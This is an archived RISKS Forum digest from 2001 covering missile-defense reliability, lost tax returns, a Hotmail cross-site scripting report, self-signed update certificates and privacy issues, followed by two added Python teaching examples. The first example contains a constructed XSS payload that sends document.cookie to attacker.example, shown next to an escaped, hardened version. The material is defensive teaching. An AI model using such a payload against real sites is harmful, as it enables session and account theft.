precedence: bulk
Subject: Risks Digest 21.63

RISKS-LIST: Risks-Forum Digest  Saturday 1 September 2001  Volume 21 : Issue 63

   FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
   ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at and by anonymous ftp at ftp.sri.com, cd risks .

  Contents:
The Heavens at War: NMD assessed (Pete Mellor)
SDI chief says system may not be reliable (PGN)
Federal tax returns missing in Pennsylvania (PGN)
Hotmail hackable with one line of code (NewsScan)
Even dead people use Microsoft software (Jeremy Epstein)
More interesting MS certificates (Stuart Prescott)
Directory service based on car license plate (Ulf Lindqvist)
Re: Air Force office mails confidential information ... (Jay D. Dyson)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Wed, 29 Aug 2001 11:44:20 +0100 (BST)
From: Pete Mellor
Subject: The Heavens at War: NMD assessed

The Heavens at War: BBC Radio 4, 28th August 2001
Reporter and presenter: Jackie Hardgrave.

Preface

The following summary is based upon notes made while listening to the first
broadcast of the programme, together with reference to the web-site (which
does not include a full transcript). It is as fair a summary of the content of
the programme as I could manage. However, shorthand is not one of my many
talents, and I cannot claim total accuracy. I stand to be corrected if I have
misquoted or wrongly attributed a quotation. I have indicated uncertain
spellings of people's names by (sp?). I have placed my own comments in
brackets: [PM: my comments] and added some more at the end.

Please see the web site: http://www.bbc.co.uk/radio4/atoz/heavens_at_war.shtml,
or listen to the repeat broadcast on Sunday 2nd September at 5pm (British
Summer Time).
Introduction

The programme concerned the National Missile Defense system (NMD). [PM: It
used that name throughout, although the "National" has now been dropped and it
is known as "Missile Defense System" (MDS), I believe.] This is also known as
"Son of Star Wars" after the nickname for President Reagan's earlier Strategic
Defense Initiative (SDI).

Main question: Will the technology work or is it doomed to expensive failure?

The threat to the US is now perceived to be from "rogue states" and no longer
an all-out nuclear strike from Russia. North Korea, Iran and Iraq were
specifically mentioned. Also, although China and Russia have sophisticated
systems, an accidental launch is a possible threat.

In 1972 only 9 nation states had the capability to launch an intercontinental
ballistic missile. This number has vastly increased. Around 1000 ICBMs were
produced last year. Their range is continually increasing (e.g., N. Korea has
tested a missile with an intercontinental (IC) third stage).

There is also the possibility that the possession of intercontinental missiles
may be used in diplomatic blackmail to deter the USA from some course of
action. Michael O'Hanlon, a Senior Fellow in Foreign Policy Studies at The
Brookings Institution (a private institution that studies public policy), gave
the example of Iraq launching a new but limited attack on the Kuwaiti oilfields
in 10 to 20 years time. If Iraq was by then capable of launching missiles at
the USA, and a new "Desert Storm" was on the way, Saddam Hussein (or Uday, who
might have taken over by then) would see no reason not to "play for keeps" and
threaten to launch an ICBM attack, or actually attack a small city as a
demonstration of what they could do.

President Reagan began the original "Star Wars" -- which failed due to
financial [PM: and technical?] reasons. Why is "Son of Star Wars" under way
now? 1998 was a pivotal year. India and Pakistan both tested nuclear warheads.
The Rumsfeld (sp?)
commission reported that a nation could easily develop the capability to
produce nuclear warheads and then surprise the West by suddenly testing them.
China was suspected of having obtained the nuclear secrets of the USA by
espionage.

The Technical Dimension

There are three phases in which to destroy an ICBM launched against one's
territory:-

1. On first launch, before the missile has left the atmosphere. This provides
   a very short window of opportunity, but the missile is relatively easily
   detectable by the plume of exhaust gases from the boosters or first stage
   launch vehicle.

2. In mid-course, after the missile has left the atmosphere and is following a
   ballistic trajectory through space. This offers the easiest opportunity,
   since it is the longest phase. During this phase the missile might break up,
   and release its warheads and "decoys" (see below) to follow their separate
   paths.

3. After reentry into the atmosphere when the missile is minutes away from its
   target. By this stage, the missile will almost certainly have broken up (if
   it is going to do so), releasing its lethal payload along with its decoys.

Three interception tests have been conducted so far. [PM: I believe these were
mid-course.] Two failed, and the third (a few weeks ago) succeeded [PM: but
this "success" has been questioned!].

NMD requires long-range interceptor missiles to destroy hostile ICBMs. The
interceptor releases a "kill vehicle" which homes in on, and collides with, the
incoming ICBM. No explosives are involved. The concept has been described as a
"smart rock" or a "bullet to hit a bullet". [PM: the term "smart rock" cropped
up in the earlier SDI also.]

A total of 250 interceptor missiles with kill vehicles are to be deployed in
Alaska and Florida (?). Incoming ICBMs will be detected by ground-based radar
and by satellite-based infrared sensors. Nine new radar systems will sort
warheads from decoys. Satellite-based infrared sensors will assist interception
in outer space.
The problem here is that heavy objects (e.g., nuclear warheads) have the same
trajectory as light objects. The incoming ICBM could therefore deploy light
weight decoys in large numbers without sacrificing range. For example, decoys
could be mylar balloons with aluminium coating. Dozens of these could be
released. In some cases, it may be necessary to launch several interceptors.

Philip E. Coyle, an advisor to the Center for Defense Information (an
independent Military Research Organisation) and until recently the director of
Operational Test and Evaluation at the Pentagon, with responsibility for
overseeing NMD testing, gave the "hole in one" analogy. Hitting an incoming
ICBM is like trying to score hole in one (you only get one shot!) on a golf
course where the hole is moving at 15000 mph. With decoys, this is like having
a lot of holes with flags to aim at and having to choose the right one at the
same time! The problem would be very different in a real situation (unlike the
tests conducted so far). Not all eventualities can be planned for.

Lisbeth Gronlund, Senior Staff Scientist of the Union of Concerned Scientists,
pointed out that any nation that was capable of missile production would find
the production of balloon decoys a trivial problem. The tests so far have used
decoys, and in the successful test the kill vehicle did pick the correct
target, but this was not a realistic test, since the "warhead" was different in
appearance and temperature to the decoys [PM: presumably to a degree greater
than that which the designers of a real attacking ICBM could achieve?].

At least one of Coyle and Gronlund suggested that NMD will never be tested in
realistic conditions before being deployed, since it would almost certainly
fail!

O'Hanlon's views partly agreed with this. NMD cannot be tested in a totally
real situation.
However he believes that it is possible to get close to it, for example by not
telling the "defenders" when the "hostile" missile that is their target is to
be launched and what decoys it will deploy. He stated that, although it would
be a delusion to assume that 100% success could be guaranteed, a 95%
confidence in a NMD system would be better than no defence at all. [PM: See
below!]

The Ballistic Missile Defense Organization adopts a more bullish position: a
solution to all of these problems will be found. One telling quotation
(unattributed) was: "The United States will do what the United States has to
do!" Anyway, the adversary will take time to prepare and test counter-measures,
and this activity will betray itself to the intelligence agencies.

However, there is a more serious problem if the ICBM carries a lethal chemical
or biological payload. Unlike a nuclear warhead, which is an integrated complex
device, the lethal material is just "stuff". The payload could divide up into
twenty or more bomblets which would be released and would fan out over the
target area. These would all be identical in appearance, all real, and all
lethal.

Faced with this possibility, the defenders' best tactic is to strike
immediately after launch, while there is only one target. This requires an
interceptor missile close to the point of launch. In practice, this means on
board a ship. President Bush has approved the budget to develop this
capability. However, neither the ships nor the missiles they will carry have
yet been developed, and they will not be ready for service for many years.

Tom Colleenor (sp?) pointed out that a strike in the first stage after launch
would allow only a minute or two to decide whether to launch the interceptor,
which means that the decision must be taken by a field commander. [PM: This
has interesting political and strategic military implications!]
For a more "Star Wars" approach the team visited Kirkland Air Force base in New
Mexico to observe developments in a real "ray gun": the use of a laser beam
strike against an ICBM. Undergoing development is the Airborne Laser (ABL) on
B747 aircraft. This consists of four lasers, three to track the missile and
one to kill it with a one million watt bolt of energy.

The attack would proceed as follows: the launch of the hostile ICBM is detected
by infrared sensor detection (IRSD) [PM: on the aircraft or on satellite?]. The
aircraft uses its tracking lasers to get the range and bearing and locks on to
the exhaust plume. It then aims its large laser in the nose of the aircraft at
the plume and tracks up to the nose of the missile and unleashes its energy.
The effect is not to destroy the missile in a sudden explosion, but to heat
the fuel tanks to the extent that they develop cracks and so to cause a
structural failure.

It will take many years for this to become ready for combat. In the meantime,
spin-offs in smaller tactical or space-borne lasers might provide some
returns. [PM: Space-borne lasers were a feature of the original SDI. These
were to be mounted on orbiting robotic "battle stations". One proposal (which
was the subject of actual nuclear tests) was that the gamma radiation from a
nuclear explosion could be harnessed into a single collimated beam which would
fry everything in its path. A battle station carrying such a weapon would
obviously be a "one-shot" device!]

Joe Cirincioni (sp?) pointed out that, also in the meantime, the bad guys could
develop a few simple counter-measures such as polishing the nose-cone to reduce
absorption of radiation, spinning the missile (not as easy as it sounds) to
avoid overheating of any one part of the surface, or insulating it with a
coating (such as cork!) to avoid things getting too hot.

President Bush is apparently willing to spend, spend, spend his way around
these minor technical problems.

The Political Dimension

OK.
So what is there for us to worry about here? Answer: Lots! [PM: "Us" seemed
to mean Europeans. However, most of the worried voices on the programme were
American, which could be good news.]

NMD will breach the 1972 Anti-Ballistic Missile (ABM) treaty by end of this
year if the Bush administration pursues its present course. The pro-ABM
argument is that the treaty achieved a stable stalemate between the two
nuclear superpowers during the cold war by preventing either from developing
an effective protection system from behind which to launch a pre-emptive
nuclear strike, and that it still operates to forestall an offensive arms
race.

The opposing view was put by Senator Kyle, who argued that the ABM treaty was
useful only in the cold war when there were only two nuclear superpowers and
that it is no longer relevant. He went on to argue that the treaty was not a
cause of stability, and that the offensive arms race continued with the treaty
in place. In fact, it locked the superpowers into a strategy based on mutually
assured destruction (appropriate acronym: MAD): If you wipe us out, we'll wipe
you out, and then we'll all be dead! This no longer makes sense, since there
is no longer a monolithic enemy on the other side of an Iron Curtain. The
rules have changed, and we in the US will act in our interests, not Russia's
nor anyone else's. Russia cannot veto NMD, and indeed, the only sanction it
could threaten is a renewal of an offensive arms race which it can no longer
afford.

President Putin is less than chuffed about this! There is some hope that a
detente might be reached around a trade-off of NMD and nuclear weapons
reduction, but the USA is currently gung-ho for its impenetrable shield.

O'Hanlon was worried that NMD might jeopardise attempts to work with Russia to
control, stabilise, and (eventually) decommission (or at least reduce) its
nuclear arsenal. It still holds thousands of nuclear warheads mounted on ICBMs.
These constitute a hair-trigger weapon which could be aimed at the West in an
instant. [PM: Russia announced several years ago that its nuclear missiles
were no longer aimed at the West. Unfortunately, to re-aim them would take
about as long as it takes to download the software. How long did your last
reboot take? Another small point is that many of the weapons are in the
territory of (and under the control of?) newly independent and politically
unstable states which are ex-USSR.]

O'Hanlon said that the fact that the ABM treaty is 30 years old does not make
it a "relic". His mortgage is 30 years old, but is still not a relic, and the
Constitution of the United States is even older, but is still regarded as a
useful document.

He cited an interesting example. In 1998 a "sounding" rocket launched from
Norway was mistaken for a US attack vehicle by the Russian defences. They were
minutes from a retaliatory launch when the mistake was discovered.

Ivan Zifrancuk (sp?), a Russian defence expert, was interviewed to give the
Russian point of view.

America's allies are also worried. Radar bases and communications in the UK
are needed for tracking. The Menwith Hills installation has been the target of
a Greenpeace protest. [PM: The compliance of the present British government is
remarkable, given the likelihood that the presence of tracking stations will
make Yorkshire a primary target for America's enemies. France and Germany have
been more outspoken.] Phyllis Starkey MP was interviewed and stated that in
her opinion NMD was a destabilising influence, and that the British Government
should look to British interests.

O'Hanlon cited the problem of China (particularly sensitive since the loss of
one of its fighter aircraft in collision with a US spy plane earlier this
year). The Bush administration has taken pains to reassure the Chinese (as it
has the Russians) that NMD is not an offensive capability aimed at them.
Unfortunately, there is a long-standing dispute over Taiwan, and in the medium
term NMD could be capable of neutralising the effect of Chinese missiles. At
the last count, China had only 20 missiles capable of reaching American soil.
Senator Kyle stated that the USA would never tolerate a military take-over of
Taiwan by China, and would come to its defence. The existence of NMD would
therefore be perceived as a threat by China, and may provoke an arms race with
China.

Conclusion

The old competition between predator and prey, between defence and offence,
between the baron in the castle and the besiegers using the siege catapult
were quoted. The difference here is that the "castle" in this new cycle of
competition cannot be built without the expenditure of billions of dollars,
whereas the "catapult" (the means of penetrating or circumventing NMD) are
relatively cheap.

So where is the money to come from? Step forward the loyal, long-suffering
(and notoriously tight-fisted) US taxpayers! President Bush has promised to
lighten their burden. Is NMD consistent with this?

As the programme concluded: "The world awaits your decision!"

= = = = = = = = Peter Mellor: Personal Comments = = = = = = = =

The Missing Dimension: Safety, Reliability, and Software

When President Reagan launched the Strategic Defense Initiative (SDI, aka
"Star Wars"), it was intended to provide an absolutely impregnable defence for
the USA against ICBM attack. It was widely regarded as utterly fantastical in
conception, absurdly expensive to design and construct, impossible to test,
and ineffective for its intended purpose.

An impregnable defence must have a negligible probability of letting one
attacking missile through. O'Hanlon states that a "95%" confidence is better
than no defence at all. Where thermonuclear devices are concerned, a 1%
failure rate under mass attack means that you might as well not have bothered.
(I saw a bumper-sticker in California which read: "A single nuclear device can
really spoil your day". I agree!)

To destroy the USA, only four devices are required, one at each corner, in the
stratosphere, outside US territory. The electromagnetic pulse would cause an
electrical potential spike which would zap every non-hardened semiconductor
device in the country. Eight out of every ten dollars would disappear in an
instant. (Think about it!)

Hitler gave up on the air assault on Britain since he realised he could not
cope with a 10% attrition rate on the raiding forces. Now we need a 99.9999%
(or higher) attrition rate.

The NMD is a cut-down version of SDI. At least we no longer have to contend
with the spectre of a world patrolled by ever-alert robot battle stations in
orbit armed with thermonuclear devices to deliver collimated gigawatt doses of
energy to anything which ascends above 50,000 feet and rail-guns firing
several thousands of rounds per second of hypersonic projectiles at any
suspect object in orbit. The NMD proposals are less fantastic, but perhaps the
more dangerous for being slightly more plausible.

What SDI and NMD have in common is that they are both crucially dependent on
software for command and control. The head of software development for SDI
was David L. Parnas. Once he became aware that the current software
development methods could not yield the impossibly high reliability required
for SDI, he did the decent thing and resigned. He did so very publicly and
published his reasons for becoming totally disillusioned with the farcical
SDI enterprise in a brilliant essay in which he stacked up each one of the
then popular methods and showed why it was doomed to fail. [As I recall,
David was merely on a review panel, not head of development. PGN] His
resignation and essay probably did as much to scupper SDI as its ludicrous
and exponentially increasing cost.
Now, either we have solved all of the problems with developing high-integrity
real-time embedded software in the few years since SDI was abandoned (and I
don't believe it for a nanosecond), or we are into another technically
infeasible and ultimately farcical project.

I have seen no discussion of NMD in the safety-critical systems list recently,
and no criticism anywhere from the reliability and safety viewpoint. (It was
not even mentioned in the BBC Radio 4 programme "The Heavens at War" that I
have summarised above.) The silence is deafening!

Peter Mellor, Centre for Software Reliability, City University,
Northampton Square, London EC1V 0HB
Tel.: +44 (0)20 7040 8422 )  NOTE: Code recently changed from
Fax.: +44 (0)20 7040 8585 )  7477 to 7040
e-mail: Pete Mellor

------------------------------

Date: Wed, 15 Aug 2001 18:31:22 PDT
From: "Peter G. Neumann"
Subject: SDI chief says system may not be reliable

The head of the Pentagon's missile defense programs said he is not fully
confident in the "basic functionality" of the anti-missile system that
successfully intercepted a mock warhead in space last month. That is why the
next test of the system, scheduled for October, will be a replay of the July
14 test, with no additional complexities such as putting more decoys aboard
the target missile, Air Force Lt. Gen. Ronald Kadish, director of the
Ballistic Missile Defense Organization, told a group of reporters. "It is
still not totally comfortable for me to say that we can make the hit-to-kill
technology work consistently, even in that simple scenario," Kadish said,
adding later, "We still need some more reliability in there."

  [Source: AP item, Missile Defense Chief 'Not Totally Comfortable' With
  Reliability of Anti-Missile System, 15 Aug 2001; and then, there are reports
  of the GPS-aided homing beacon that aided the tests -- even the two that
  failed! PGN]

------------------------------

Date: Wed, 29 Aug 2001 20:00:05 -0700 (PDT)
From: "Peter G. Neumann"
Subject: Federal tax returns missing in Pennsylvania

As many as 40,000 federal tax returns [earlier thought to be only 1800] and
tax payment checks totaling more than $800 million from New England and
upstate New York have been lost or destroyed at a processing center operated
by the Mellon Bank in Pittsburgh for the Internal Revenue Service. One source
was quoted as saying, "The system was flawed. It gave them incentive to stick
the payments in a drawer. It was almost cost-effective for Mellon to do that.
There was no reward for timely processing." (A somewhat similar case at the
IRS Philadelphia center in the mid-1980s was also noted.)

  [Source: Albert B. Crenshaw, *The Washington Post*, 30 Aug 2001; Page E01]

------------------------------

Date: Fri, 31 Aug 2001 10:35:17 -0700
From: "NewsScan"
Subject: Hotmail hackable with one line of code

Security consultant Jeremiah Grossman was able to break through Microsoft's
Hotmail and Passport protection schemes with just one line of code. Microsoft
has patched the code, but Grossman says he could do it again in 8 hours of
work. His hacking experiment used a "cross-site scripting" technique that
attaches invasive code onto programs used to make Web pages more interactive.
Grossman calls them "a breeding ground for new types of Web security
vulnerabilities," and Shawn Hernan of the Computer Emergency Response Team at
Carnegie Mellon University says that "it's easy to dream up very, very bad
scenarios."

  [*USA Today*, 31 Aug 2001; NewsScan Daily, 31 August 2001
  http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security.htm]

------------------------------

Date: Fri, 24 Aug 2001 10:19:27 -0400
From: "Jeremy Epstein"
Subject: Even dead people use Microsoft software

Computerworld reports that a Microsoft letter-writing campaign opposing the
anti-trust actions used the names of dead people. The Utah Attorney General,
who received the letters, was not amused.
Other Attorneys General received duplicate letters with similar problems.
MSFT says they didn't do it, but pointed to "Citizens Against Government
Waste" which is leading the effort.
(http://www.computerworld.com/storyba/0,4125,NAV47_STO63256,00.html)

The risk is that any sufficiently automated letter writing system is going to
eventually screw up and get caught. Dead people don't handwrite letters.

------------------------------

Date: Fri, 24 Aug 2001 10:32:53 +1000
From: Stuart Prescott
Subject: More interesting MS certificates

I noticed today that the Microsoft WindowsUpdate site was offering a Service
Pack 2 for Internet Explorer, and since a number of our machines here use
IE5.5 I decided to have a look at what "functionality" it offered.

As with all downloads from WindowsUpdate, they are cryptographically signed;
however, this time some of the components were signed by "IE Beta Division",
with a certificate authority of "IE Beta Division"... i.e. (PGN: pardon the
pun) the certificates are not trustworthy.

The RISKS? Naturally, there are issues here in verifying that these updates
are actually from Microsoft. Then there are the RISKS of users saying "No" to
installing the badly signed bits and possibly ending up with a (more) broken
IE installation. Or there is the RISK of users becoming used to dismissing
error messages....

I didn't realise that MS and IE could become even scarier with time...

------------------------------

Date: Mon, 27 Aug 2001 09:38:03 -0700 (PDT)
From: Ulf Lindqvist
Subject: Directory service based on car license plate

>From Swedish newspaper *Aftonbladet* Aug 27, 2001,
http://www.aftonbladet.se/vss/nyheter/story/0,2789,84644,00.html

In Sweden, a new type of directory service will soon be introduced by the
company Ahhaaa [yes, that actually seems to be their name, see
http://www.ahhaaa.com/ ].
You will be able to call this service 24-7, give the license plate number of a
car, and they will immediately tell you the name, address and phone number of
the person registered as owner of that car. If the owner is a business, they
will also tell you the number of employees and annual revenue.

The article states a number of "benefits", such as calling the driver who
just cut you off to complain, locate parking violators or notify an owner
whose car has been broken into. Last but not least, the article suggests that
if you find another driver attractive, this service would make it easier to
make contact.

It does not take a criminal mastermind to see ample opportunities for abuse -
road rage, stalking, fraud etc.

One could argue that this information has always been available to the public
in Sweden, albeit from different sources (see
http://justitie.regeringen.se/pressinfo/pdf/publicaccess.pdf for an
explanation of the Swedish Principle of Public Access to Information).
However, with modern technology, deregulation of telecommunication services,
and the ubiquitousness of mobile phones, the information is instantly
available and therefore the opportunities to act on impulse are much greater.

Ulf Lindqvist, System Design Lab, SRI International, 333 Ravenswood Ave,
Menlo Park CA 94025-3493, USA  +1 650 859-2351  http://www.sdl.sri.com/

------------------------------

Date: Sat, 25 Aug 2001 19:30:05 -0700 (PDT)
From: "Jay D. Dyson"
Subject: Re: Air Force office mails confidential information ...

Jim Griffith (RISKS-21.62) noted an Air Force Academy officer accidentally
sent confidential information about some 40 cadets to all 4400 cadets at the
school.

This incident sounds suspiciously like a Sircam worm infection of the
officer's system. First off, I doubt that e-mail is typically utilized to
send out such reports since such confidential information should never be
sent in the clear.
Secondly, how else can the Air Force explain the means by which the mail was
so readily disseminated?

I don't believe we're being told the whole story here. And I believe an
officer is being let off the hook when he should be nailed for actions that
are tantamount to criminal negligence.

------------------------------

Date: 12 Feb 2001 (LAST-MODIFIED)
From: RISKS-request@csl.sri.com
Subject: Abridged info on RISKS (comp.risks)

 The RISKS Forum is a MODERATED digest.  Its Usenet equivalent is comp.risks.
=> SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent)
 if possible and convenient for you.  Alternatively, via majordomo,
 send e-mail requests to  with one-line body
   subscribe [OR unsubscribe]
 which requires your ANSWERing confirmation to majordomo@CSL.sri.com .
 [If E-mail address differs from FROM:  subscribe "other-address " ;
 this requires PGN's intervention -- but hinders spamming subscriptions, etc.]
 Lower-case only in address may get around a confirmation match glitch.
   INFO     [for unabridged version of RISKS information]
 There seems to be an occasional glitch in the confirmation process, in which
 case send mail to RISKS with a suitable SUBJECT and we'll do it manually.
   .MIL users should contact  (Dennis Rears).
   .UK users should contact .
=> The INFO file (submissions, default disclaimers, archive sites,
 copyright policy, PRIVACY digests, etc.) is also obtainable from
 http://www.CSL.sri.com/risksinfo.html  ftp://www.CSL.sri.com/pub/risks.info
 The full info file will appear now and then in future issues.  *** All
 contributors are assumed to have read the full info file for guidelines. ***
=> SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line.
=> ARCHIVES are available: ftp://ftp.sri.com/risks or
 ftp ftp.sri.com<CR>login anonymous<CR>[YourNetAddress]<CR>cd risks
   [volume-summary issues are in risks-*.00]
   [back volumes have their own subdirectories, e.g., "cd 20" for volume 20]
 http://catless.ncl.ac.uk/Risks/VL.IS.html      [i.e., VoLume, ISsue].
 Lindsay Marshall has also added to the Newcastle catless site a palmtop
 version of the most recent RISKS issue and a WAP version that works for many
 but not all telephones: http://catless.ncl.ac.uk/w/r
 http://the.wiretapped.net/security/info/textfiles/risks-digest/ .
 http://www.planetmirror.com/pub/risks/  ftp://ftp.planetmirror.com/pub/risks/
==> PGN's comprehensive historical Illustrative Risks summary of one liners:
 http://www.csl.sri.com/illustrative.html for browsing,
 http://www.csl.sri.com/illustrative.pdf or .ps for printing

------------------------------

End of RISKS-FORUM Digest 21.63
************************
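Editor's note on the Hotmail item ("Hotmail hackable with one line of code", NewsScan, above). The article says only that Grossman used cross-site scripting; it does not give his payload or the page he hit. The following is an added example, written for this page and not taken from the article or from Grossman, that shows the bug in its simplest reflected form next to the fix: a page that copies request parameters into its markup, first unescaped, then with output encoding and a scheme check on the link target. The query strings, the parameter names `name` and `next`, the host `attacker.example` and the cookie-stealing script are all constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request query strings (the article does not give Grossman's payload).
BENIGN = "name=Alice&next=/inbox"
SCRIPT_PAYLOAD = (
    "name=%3Cscript%3Elocation%3D%27http%3A//attacker.example/%3Fc%3D%27"
    "%2Bdocument.cookie%3C/script%3E&next=/inbox"
)
URL_PAYLOAD = "name=Alice&next=javascript%3Aalert(document.cookie)"


def _param(query, key):
    return parse_qs(query, keep_blank_values=True).get(key, [""])[0]


def render_vulnerable(query):
    """Reflects request parameters straight into the page: the classic bug."""
    name = _param(query, "name")
    nxt = _param(query, "next")
    return f'<p>Hello, {name}!</p><a href="{nxt}">Continue</a>'


def safe_url(candidate):
    """Accept a same-site path or an absolute http(s) URL; otherwise fall back to '/'.
    Escaping alone cannot fix this context: 'javascript:...' contains nothing
    html.escape would touch, so the scheme itself has to be checked."""
    parts = urlsplit(candidate)
    if parts.scheme == "" and candidate.startswith("/") and not candidate.startswith("//"):
        return candidate
    if parts.scheme in ("http", "https") and parts.netloc:
        return candidate
    return "/"


def render_hardened(query):
    """Same page with output encoding for element text and quoted attributes,
    plus scheme validation for the URL attribute."""
    name = html.escape(_param(query, "name"), quote=True)
    nxt = html.escape(safe_url(_param(query, "next")), quote=True)
    return f'<p>Hello, {name}!</p><a href="{nxt}">Continue</a>'


def has_active_content(page):
    """Crude marker used only to contrast the two renderers (not a real XSS filter)."""
    lowered = page.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    for q in (BENIGN, SCRIPT_PAYLOAD, URL_PAYLOAD):
        print("vulnerable:", render_vulnerable(q))
        print("hardened:  ", render_hardened(q))
```

Two points the article's one sentence does not make. First, the encoding has to match the context: `html.escape` is correct for element text and for a quoted attribute value, but it is useless for a URL attribute carrying a `javascript:` scheme, and different rules again apply inside a script block or an event handler. Second, the payload runs in the victim's origin, which is why a webmail session cookie is the natural target; the script here only illustrates that, nothing in the page says what Grossman's line actually did.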
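Editor's note on Stuart Prescott's item ("More interesting MS certificates", above). Components signed by "IE Beta Division" with "IE Beta Division" as the certificate authority means a self-signed certificate: the signature over the update can verify perfectly and still tell you nothing about who produced it, because the chain never reaches a root the verifier trusts. The following added example, written for this page and not Microsoft's Authenticode code or anything from the post, models that distinction with a tiny chain verifier. The signature scheme is textbook RSA over small Mersenne-prime moduli with no padding, a toy standing in for real X.509 signatures so the block runs on the standard library alone; the subject names other than "IE Beta Division", the key sizes and the update bytes are constructed.

```python
import hashlib
from dataclasses import dataclass

E = 65537  # public exponent shared by every toy key


def mersenne(k):
    """2**k - 1; the exponents used below (19, 31, 61, 89, 107, 127) all give primes."""
    return (1 << k) - 1


@dataclass(frozen=True)
class Key:
    n: int  # public modulus
    d: int  # private exponent, held only by the certificate's subject


def keygen(p, q):
    return Key(p * q, pow(E, -1, (p - 1) * (q - 1)))


def digest_mod(data, n):
    # Toy: SHA-256 of the data reduced into the modulus range (no padding).
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(key, data):
    return pow(digest_mod(data, key.n), key.d, key.n)


def verify(n, data, sig):
    return pow(sig, E, n) == digest_mod(data, n)


@dataclass(frozen=True)
class Cert:
    subject: str
    issuer: str
    pub_n: int      # subject's public modulus
    signature: int  # issuer's signature over tbs()

    def tbs(self):
        """The 'to be signed' bytes: who, issued by whom, with which key."""
        return f"{self.subject}|{self.issuer}|{self.pub_n}".encode()


def issue(subject, subject_key, issuer, issuer_key):
    unsigned = Cert(subject, issuer, subject_key.n, 0)
    return Cert(subject, issuer, subject_key.n, sign(issuer_key, unsigned.tbs()))


def verify_signed_blob(blob, sig, leaf, certs_by_subject, trusted_roots):
    """Return (ok, reason). trusted_roots maps subject -> public modulus."""
    if not verify(leaf.pub_n, blob, sig):
        return False, "bad signature on blob"
    cert = leaf
    for _ in range(8):  # bound the walk so a cycle cannot spin forever
        if trusted_roots.get(cert.subject) == cert.pub_n:
            return True, f"chains to trusted root {cert.subject!r}"
        if cert.issuer == cert.subject:
            # Self-signed and not in the trust store: internally consistent
            # (the signature verifies) but nobody we trust vouched for it.
            if verify(cert.pub_n, cert.tbs(), cert.signature):
                return False, f"self-signed by {cert.subject!r}, not a trusted root"
            return False, f"bad self-signature on {cert.subject!r}"
        issuer = certs_by_subject.get(cert.issuer)
        if issuer is None:
            return False, f"issuer {cert.issuer!r} not found"
        if not verify(issuer.pub_n, cert.tbs(), cert.signature):
            return False, f"bad signature by {cert.issuer!r} on {cert.subject!r}"
        cert = issuer
    return False, "chain too long"


# Constructed PKI for the demonstration (subject names other than
# "IE Beta Division" are assumed, not taken from the post).
ROOT_KEY = keygen(mersenne(89), mersenne(107))
LEAF_KEY = keygen(mersenne(61), mersenne(127))
BETA_KEY = keygen(mersenne(19), mersenne(31))

ROOT = issue("Example Root CA", ROOT_KEY, "Example Root CA", ROOT_KEY)
LEAF = issue("Example Corp Code Signing", LEAF_KEY, "Example Root CA", ROOT_KEY)
BETA = issue("IE Beta Division", BETA_KEY, "IE Beta Division", BETA_KEY)

TRUSTED = {"Example Root CA": ROOT_KEY.n}
CERTS = {c.subject: c for c in (ROOT, LEAF, BETA)}

UPDATE = b"constructed bytes standing in for an IE service pack component"
GOOD_SIG = sign(LEAF_KEY, UPDATE)
BETA_SIG = sign(BETA_KEY, UPDATE)

if __name__ == "__main__":
    print(verify_signed_blob(UPDATE, GOOD_SIG, LEAF, CERTS, TRUSTED))
    print(verify_signed_blob(UPDATE, BETA_SIG, BETA, CERTS, TRUSTED))
    print(verify_signed_blob(UPDATE + b"!", GOOD_SIG, LEAF, CERTS, TRUSTED))
```

The last test below is the one that matters for Prescott's third RISK: the "IE Beta Division" signature is rejected only because that certificate is absent from the trust store. A user who answers the warning dialog by adding it (or who is trained to click through) has turned an untrusted self-signed key into a trusted root, and from then on anything signed with it passes.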